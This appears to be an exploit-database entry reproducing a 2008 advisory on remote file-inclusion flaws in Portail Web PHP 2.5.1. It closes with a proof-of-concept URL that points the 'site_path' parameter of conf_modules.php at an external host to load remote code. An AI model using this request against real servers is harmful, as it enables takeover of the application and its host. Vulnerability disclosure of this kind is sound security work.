Portail Web PHP 2.5.1 - conf_modules.php Remote File Inclusion

2008-02-04T00:00:00
ID EXPLOITPACK:30454633D8FF4B2435572F02312F64E1
Type exploitpack
Reporter Psiczn
Modified 2008-02-04T00:00:00

Description

Portail Web PHP 2.5.1 - conf_modules.php Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/27616/info
  
Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
  
These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. 

http://www.example.com/path/admin/system/modules/conf_modules.php?site_path=http://www.example2.com